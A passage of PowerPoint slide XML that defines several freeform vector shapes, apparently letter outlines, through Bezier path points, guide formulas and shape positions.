                  <a:moveTo>
                    <a:pt x="160" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="236"/>
                    <a:pt x="138" y="278"/>
                    <a:pt x="99" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="278"/>
                    <a:pt x="34" y="242"/>
                    <a:pt x="34" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150"/>
                    <a:pt x="69" y="118"/>
                    <a:pt x="104" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="118"/>
                    <a:pt x="160" y="146"/>
                    <a:pt x="160" y="17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30" name="Freeform 271">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2203B3E1-6A58-468E-95C3-64A4823ECF5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId71"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2078039" y="3521076"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="174"/>
                    <a:pt x="204" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="154"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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31" name="Freeform 272">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E66C33-D7D1-45DA-976C-9302A161EEE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId72"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2192339" y="3521076"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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32" name="Freeform 273">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1966E4E-89C2-4186-B83C-4CA800D5F863}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId73"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2289176" y="3522663"/>
              <a:ext cx="104775" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 250"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 193 w 250"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 250"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 250 w 250"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 230 w 250"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 250"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 250"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 250"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 151 w 250"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 250"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 250"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 173 w 250"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 173 w 250"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 250"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 250"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 21 w 250"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 250"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 250"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 43 w 250"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 43 w 250"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 250"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 173 w 250"/>
                <a:gd name="T47" fmla="*/ 19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0" h="218">
                  <a:moveTo>
                    <a:pt x="173" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="184" y="215"/>
                    <a:pt x="193" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="250" y="215"/>
                    <a:pt x="250" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="185"/>
                    <a:pt x="237" y="185"/>
                    <a:pt x="230" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="188"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="173" y="19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33" name="Freeform 274">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C3A42B-8FEB-4513-9953-EE945E0C8584}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId74"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2395539" y="3521076"/>
              <a:ext cx="109538" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="10" y="34"/>
                    <a:pt x="28" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="161" y="188"/>
                    <a:pt x="143" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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34" name="Freeform 275">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3088C9E8-6B4B-4CAC-8C35-E55A5CC9EFCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId75"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2519364" y="3521076"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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35" name="Freeform 276">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A301FB8-1E1E-4C5F-949A-28E5ABF25B5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId76"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2620964" y="3521076"/>
              <a:ext cx="104775" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
